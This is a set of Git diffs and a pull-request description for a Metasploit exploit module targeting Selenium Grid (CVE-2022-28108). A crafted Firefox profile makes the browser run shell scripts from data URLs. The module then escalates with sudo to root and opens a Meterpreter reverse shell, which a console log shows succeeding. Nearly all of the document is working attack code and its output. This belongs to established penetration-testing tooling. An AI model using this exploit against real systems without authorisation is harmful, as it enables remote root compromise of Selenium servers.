+        'Author' => [
+          'Jon Stratton',     # Exploit development
+          'Takahiro Yokoyama' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2022-28108'],
+          ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'],
+          ['URL', 'https://github.com/JonStratton/selenium-node-takeover-kit/tree/master'],
+          ['EDB', '49915'],
+        ],
+        'Payload' => {
+          'DisableNops' => true
+        },
+        'Platform' => %w[linux],
+        'Targets' => [
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'WGET'
+              }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2022-04-18',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(4444),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return Exploit::CheckCode::Unknown unless res&.code == 200
+
+    js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
+    return Exploit::CheckCode::Unknown unless js_code
+
+    json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
+    json_data = JSON.parse(json_str)
+    return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version']
+
+    # Extract the version
+    version = Rex::Version.new(json_data['version'])
+    if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
+      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
+    end
+
+    print_status("Version #{version} detected, which is vulnerable")
+    Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    # Build profile zip file.
+    stringio = Zip::OutputStream.write_buffer do |io|
+      # Create a handler for shell scripts
+      io.put_next_entry('handlers.json')
+      io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
+    end
+    stringio.rewind
+    encoded_profile = Base64.strict_encode64(stringio.sysread)
+
+    # Create session with our new profile
+    new_session = {
+      desiredCapabilities: {
+        browserName: 'firefox',
+        firefox_profile: encoded_profile
+      },
+      capabilities: {
+        firstMatch: [
+          {
+            browserName: 'firefox',
+            "moz:firefoxOptions": { profile: encoded_profile }
+          }
+        ]
+      }
+    }
+
+    hub_url = full_uri(normalize_uri(target_uri.path, 'wd/hub'))
+    uri = URI.parse(hub_url)
+    http = Net::HTTP.new(uri.host, uri.port)
+
+    # Start session with encoded_profile and save session id for cleanup.
+    session_uri = URI.parse("#{hub_url}/session")
+    request = Net::HTTP::Post.new(session_uri.request_uri, 'Content-Type' => 'application/json; charset=utf-8')
+    request.body = JSON.generate(new_session)
+    response = http.request(request)
+    session_id = JSON.parse(response.body)['value']['sessionId'] || JSON.parse(response.body)['sessionId']
+
+    sudo_payload = "rm -rf $0\nsudo su root -c '#{payload.encoded}'"
+    # URL.
+    data_url = "data:application/sh;charset=utf-16le;base64,#{Base64.encode64(sudo_payload)}"
+    data_uri = URI.parse("#{hub_url}/session/#{session_id}/url")
+    request = Net::HTTP::Post.new(data_uri.request_uri, 'Content-Type' => 'application/json; charset=utf-8')
+    request.body = JSON.generate(url: data_url)
+    http.read_timeout = 2
+    begin
+      http.request(request)
+    rescue Net::ReadTimeout
+      # Expected
+    end
+  end
+
+end

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -121,7 +122,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => new_session
     })
     fail_with(Failure::Unreachable, 'Connection failed') unless res
-    session_id = JSON.parse(res.body)['value']['sessionId'] || JSON.parse(res.body)['sessionId']
+
+    session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
+    fail_with(Failure::Unreachable, 'Failed to start session') unless session_id
+
+    register_dir_for_cleanup("/tmp/#{session_id}")
+    register_dir_for_cleanup(res.get_json_document['value']['capabilities']['moz:profile'])
+    register_files_for_cleanup("/#{datastore['FETCH_FILENAME']}")
 
     b64encoded_payload = Rex::Text.encode_base64(
       "rm -rf $0\n"\

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -15,7 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Selenium geckodriver RCE',
         'Description' => %q{
-          Selenium Server (Grid) before 4.7 allows CSRF because it permits non-JSON content types
+          Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
+          allows CSRF because it permits non-JSON content types
           such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
         },
         'Author' => [

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -112,31 +112,35 @@ class MetasploitModule < Msf::Exploit::Remote
           }
         ]
       }
-    }
-
-    hub_url = full_uri(normalize_uri(target_uri.path, 'wd/hub'))
-    uri = URI.parse(hub_url)
-    http = Net::HTTP.new(uri.host, uri.port)
+    }.to_json
 
     # Start session with encoded_profile and save session id for cleanup.
-    session_uri = URI.parse("#{hub_url}/session")
-    request = Net::HTTP::Post.new(session_uri.request_uri, 'Content-Type' => 'application/json; charset=utf-8')
-    request.body = JSON.generate(new_session)
-    response = http.request(request)
-    session_id = JSON.parse(response.body)['value']['sessionId'] || JSON.parse(response.body)['sessionId']
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'wd/hub/session'),
+      'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
+      'data' => new_session
+    })
+    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    session_id = JSON.parse(res.body)['value']['sessionId'] || JSON.parse(res.body)['sessionId']
 
-    sudo_payload = "rm -rf $0\nsudo su root -c '#{payload.encoded}'"
-    # URL.
-    data_url = "data:application/sh;charset=utf-16le;base64,#{Base64.encode64(sudo_payload)}"
-    data_uri = URI.parse("#{hub_url}/session/#{session_id}/url")
-    request = Net::HTTP::Post.new(data_uri.request_uri, 'Content-Type' => 'application/json; charset=utf-8')
-    request.body = JSON.generate(url: data_url)
-    http.read_timeout = 2
-    begin
-      http.request(request)
-    rescue Net::ReadTimeout
-      # Expected
-    end
+    b64encoded_payload = Rex::Text.encode_base64(
+      "rm -rf $0\n"\
+      "if sudo -n true 2>/dev/null; then\n"\
+      "  sudo su root -c '#{payload.encoded}'\n"\
+      "else\n"\
+      "  #{payload.encoded}\n"\
+      "fi\n"
+    )
+
+    data_url = "data:application/sh;charset=utf-16le;base64,#{b64encoded_payload}"
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, "wd/hub/session/#{session_id}/url"),
+      'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
+      'data' => JSON.generate(url: data_url)
+    })
+    # The server does not send a response, so no check here
   end
 
 end

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Selenium geckodriver RCE',
         'Description' => %q{
-          Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types
+          Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
           such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
         },
         'Author' => [

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -3,10 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'net/http'
-require 'uri'
-require 'json'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -85,6 +81,8 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
     end
 
+    @version3 = version < Rex::Version.new('4.0.0')
+
     CheckCode::Appears("Version #{version} detected, which is vulnerable")
   end
 
@@ -120,14 +118,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'wd/hub/session'),
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
       'data' => new_session
-    })
+    }, 75)
     fail_with(Failure::Unreachable, 'Connection failed') unless res
 
     session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
     fail_with(Failure::Unreachable, 'Failed to start session') unless session_id
 
-    register_dir_for_cleanup("/tmp/#{session_id}")
-    register_dir_for_cleanup(res.get_json_document['value']['capabilities']['moz:profile'])
     register_files_for_cleanup("/#{datastore['FETCH_FILENAME']}")
 
     b64encoded_payload = Rex::Text.encode_base64(
@@ -145,6 +141,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, "wd/hub/session/#{session_id}/url"),
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
       'data' => JSON.generate(url: data_url)
+    })
+    # The server does not send a response, so no check here
+
+    send_request_cgi({
+      'method' => 'DELETE',
+      'uri' => normalize_uri(target_uri.path, @version3 ? "wd/hub/session/#{session_id}" : "session/#{session_id}"),
+      'headers' => { 'Content-Type' => 'application/json; charset=utf-8' }
     })
     # The server does not send a response, so no check here
   end

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -30,9 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://github.com/JonStratton/selenium-node-takeover-kit/tree/master'],
           ['EDB', '49915'],
         ],
-        'Payload' => {
-          'DisableNops' => true
-        },
+        'Payload' => {},
         'Platform' => %w[linux],
         'Targets' => [
           [
@@ -66,33 +64,39 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi({
+    # Request for Selenium Grid version 3
+    v3res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path)
     })
-    if res&.code != 200
-      res = send_request_cgi({
+    if v3res&.code != 200
+      # Request for Selenium Grid version 4
+      v4res = send_request_cgi({
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, 'status')
       })
-      if res && res.get_json_document && res.get_json_document.include?('value') &&
-         res.get_json_document['value'].include?('message')
-        if res.get_json_document['value']['message'] == 'Selenium Grid ready.'
+      if v4res && v4res.get_json_document && v4res.get_json_document.include?('value') &&
+         v4res.get_json_document['value'].include?('message')
+        if v4res.get_json_document['value']['message'] == 'Selenium Grid ready.'
           return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected and ready.')
-        elsif res.get_json_document['value']['message'].downcase.include?('selenium grid')
+        elsif v4res.get_json_document['value']['message'].downcase.include?('selenium grid')
           return Exploit::CheckCode::Unknown('Selenium Grid version 4.x detected but not ready.')
         end
       end
 
-      return Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Unknown('Unexpected server reply.')
     end
 
-    js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
-    return Exploit::CheckCode::Unknown unless js_code
+    js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
+    return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code
 
     json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1]
-    json_data = JSON.parse(json_str)
-    return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version']
+    begin
+      json_data = JSON.parse(json_str)
+    rescue JSON::ParserError
+      return Exploit::CheckCode::Unknown('Unable to determine the version.')
+    end
+    return Exploit::CheckCode::Unknown('Unable to determine the version.') unless json_data && json_data.include?('version') && json_data['version']
 
     # Extract the version
     version = Rex::Version.new(json_data['version'])
@@ -138,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
       'data' => new_session
     }, datastore['TIMEOUT'])
-    fail_with(Failure::Unknown, 'Connection failed.') unless res
+    fail_with(Failure::Unknown, 'Unexpected server reply.') unless res
 
     session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
     fail_with(Failure::Unknown, 'Failed to start session.') unless session_id
@@ -163,6 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     # The server does not send a response, so no check here
 
+    # This may take some time (about 5 minutes or so), so no timeout is set here.
     res = send_request_cgi({
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, @version3 ? "wd/hub/session/#{session_id}" : "session/#{session_id}"),

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
     b64encoded_payload = Rex::Text.encode_base64(
       "rm -rf $0\n"\
       "if sudo -n true 2>/dev/null; then\n"\
-      "  sudo su root -c '#{payload.encoded}'\n"\
+      "  echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d | sudo su root -c /bin/bash\n"\
       "else\n"\
       "  #{payload.encoded}\n"\
       "fi\n"

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -84,8 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
     end
 
-    print_status("Version #{version} detected, which is vulnerable")
-    Exploit::CheckCode::Appears
+    CheckCode::Appears("Version #{version} detected, which is vulnerable")
   end
 
   def exploit

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -64,28 +64,26 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    # Request for Selenium Grid version 4
+    v4res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'status')
+    })
+    if v4res && v4res.get_json_document && v4res.get_json_document.include?('value') &&
+       v4res.get_json_document['value'].include?('message')
+      if v4res.get_json_document['value']['message'] == 'Selenium Grid ready.'
+        return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected and ready.')
+      elsif v4res.get_json_document['value']['message'].downcase.include?('selenium grid')
+        return Exploit::CheckCode::Unknown('Selenium Grid version 4.x detected but not ready.')
+      end
+    end
+
     # Request for Selenium Grid version 3
     v3res = send_request_cgi({
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path)
     })
-    if v3res&.code != 200
-      # Request for Selenium Grid version 4
-      v4res = send_request_cgi({
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'status')
-      })
-      if v4res && v4res.get_json_document && v4res.get_json_document.include?('value') &&
-         v4res.get_json_document['value'].include?('message')
-        if v4res.get_json_document['value']['message'] == 'Selenium Grid ready.'
-          return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected and ready.')
-        elsif v4res.get_json_document['value']['message'].downcase.include?('selenium grid')
-          return Exploit::CheckCode::Unknown('Selenium Grid version 4.x detected but not ready.')
-        end
-      end
-
-      return Exploit::CheckCode::Unknown('Unexpected server reply.')
-    end
+    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless v3res&.code == 200
 
     js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
     return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -138,10 +138,12 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
       'data' => new_session
     }, datastore['TIMEOUT'])
-    fail_with(Failure::Unreachable, 'Connection failed.') unless res
+    fail_with(Failure::Unknown, 'Connection failed.') unless res
 
     session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
-    fail_with(Failure::Unreachable, 'Failed to start session.') unless session_id
+    fail_with(Failure::Unknown, 'Failed to start session.') unless session_id
+
+    print_status("Started session (#{session_id}).")
 
     b64encoded_payload = Rex::Text.encode_base64(
       "rm -rf $0\n"\
@@ -161,12 +163,18 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     # The server does not send a response, so no check here
 
-    send_request_cgi({
+    res = send_request_cgi({
       'method' => 'DELETE',
       'uri' => normalize_uri(target_uri.path, @version3 ? "wd/hub/session/#{session_id}" : "session/#{session_id}"),
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' }
     })
-    # The server does not send a response, so no check here
+    if res
+      print_status("Deleted session (#{session_id}).")
+    else
+      print_status("Failed to delete the session (#{session_id}). "\
+                   'You may need to wait for the session to expire (default: 5 minutes) or '\
+                   'manually delete the session for the next exploit to succeed.')
+    end
   end
 
 end

--- a/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
+++ b/modules/exploits/linux/http/selenium_greed_firefox_rce_cve_2022_28108.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Selenium geckodriver RCE',
         'Description' => %q{
-          Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
+          Selenium Server (Grid) before 4.7 allows CSRF because it permits non-JSON content types
           such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
         },
         'Author' => [
@@ -69,7 +69,22 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path)
     })
-    return Exploit::CheckCode::Unknown unless res&.code == 200
+    if res&.code != 200
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'status')
+      })
+      if res && res.get_json_document && res.get_json_document.include?('value') &&
+         res.get_json_document['value'].include?('message')
+        if res.get_json_document['value']['message'] == 'Selenium Grid ready.'
+          return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected and ready.')
+        elsif res.get_json_document['value']['message'].downcase.include?('selenium grid')
+          return Exploit::CheckCode::Unknown('Selenium Grid version 4.x detected but not ready.')
+        end
+      end
+
+      return Exploit::CheckCode::Unknown
+    end
 
     js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) }
     return Exploit::CheckCode::Unknown unless js_code
@@ -81,12 +96,12 @@ class MetasploitModule < Msf::Exploit::Remote
     # Extract the version
     version = Rex::Version.new(json_data['version'])
     if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version
-      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable")
+      return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.")
     end
 
     @version3 = version < Rex::Version.new('4.0.0')
 
-    CheckCode::Appears("Version #{version} detected, which is vulnerable")
+    CheckCode::Appears("Version #{version} detected, which is vulnerable.")
   end
 
   def exploit
@@ -122,10 +137,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => { 'Content-Type' => 'application/json; charset=utf-8' },
       'data' => new_session
     }, datastore['TIMEOUT'])
-    fail_with(Failure::Unreachable, 'Connection failed') unless res
+    fail_with(Failure::Unreachable, 'Connection failed.') unless res
 
     session_id = res.get_json_document['value']['sessionId'] || res.get_json_document['sessionId']
-    fail_with(Failure::Unreachable, 'Failed to start session') unless session_id
+    fail_with(Failure::Unreachable, 'Failed to start session.') unless session_id
 
     b64encoded_payload = Rex::Text.encode_base64(
       "rm -rf $0\n"\


### PR DESCRIPTION
One of https://github.com/rapid7/metasploit-framework/issues/19753
Chrome PR: https://github.com/rapid7/metasploit-framework/pull/19769
File read PR: https://github.com/rapid7/metasploit-framework/pull/19781

~~A bit more unstable compared to Chrome.~~ At least, the number of sessions must be fewer than `maxSessions` for the exploit to succeed.

## Vulnerable Application

Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)
allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.

The vulnerability affects:

    * Selenium Server (Grid) <= 4.27.0 (latest version at the time of this writing)

This module was successfully tested on:

    * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
    * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
    * selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
    * selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04


### Installation

1. `docker pull selenium/standalone-firefox:3.141.59`

2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59`


## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108`
4. Do: `run lhost=<lhost> rhost=<rhost>`
5. You should get a meterpreter


## Options
### TIMEOUT (required)

This is the amount of time (in seconds) that the module will wait for the payload to be
executed. Defaults to 75 seconds.


## Scenarios
```
msf6 > use exploit/linux/http/selenium_greed_firefox_rce_cve_2022_28108
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/selenium_greed_firefox_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4445
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:54866) at 2024-12-30 13:04:18 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```